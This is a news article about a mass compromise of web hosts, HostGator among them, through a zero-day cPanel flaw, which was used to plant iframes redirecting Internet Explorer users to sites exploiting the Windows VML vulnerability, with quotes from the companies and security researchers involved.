Attackers are exploiting the zero-day VML vulnerability on Windows-based machines by targeting a separate hole in cpanel, an application that’s popular with web hosting services.
The attack, which lasted from late Thursday to Saturday afternoon, used a zero-day vulnerability in cpanel to access the servers of HostGator, a Florida-based company that hosts about 600,000 domain addresses, and three other hosting companies, according to Brent Oxley, the owner of HostGator. The attackers then planted an iframe script in websites that directed some visitors to malicious addresses that would infect them.
The VML hole, and other zero-day vulnerabilities like it, represent a golden opportunity for criminals by allowing them to install spyware and other malware of their choosing on large number of machines. But finding a way to lure victims to sites carrying the infected payload remains a key challenge. Criminals involved in this weekend’s attack solved that problem by using a previously unknown vulnerability in cpanel, the leading software used to manage large numbers of websites, to gain access to hundreds or thousands of servers that dish up web pages.
“That speaks to a significant degree of planning,” says Roger Thompson, CTO of Exploit Prevention Labs. “The significant thing is that it was a mass hack with a zero day that worked.”
Oxley agrees. “The person or group that did this is very intelligent, and obviously knows how to plan a big attack,” he says. “Since this exploit could have worked on anyone running cpanel, it had nothing to do with how secure we were.” The perpetrators of the attack were most likely operating out of China or Russia, Oxley says.
Dave Koston, an operations manager at cpanel, says the company patched the hole within an hour of learning about it. An update has been pushed to the vast majority of servers that use cpanel. He says attackers had to have a valid account with each web host to be able to exploit the vulnerability.
HostGator and three other web hosts, including one that is a larger competitor to HostGator, were also attacked, Oxley says.
According to Oxley, the attackers used the cpanel flaw to gain entry to HostGator servers more than a month ago, and then lay quietly in wait until last week.
The iframe script also took pains not to call attention to itself, redirecting only visitors using Internet Explorer, the only browser susceptible to the VML vulnerability.
The attack came four days after the discovery of the VML vulnerability, which allows malicious websites to gain complete control of Windows-based machines that access the site using IE.
About 20,000 sites are attempting to exploit the flaw, according to Eric Sites, vice president of Sunbelt Software, the company that first spotted the vulnerability.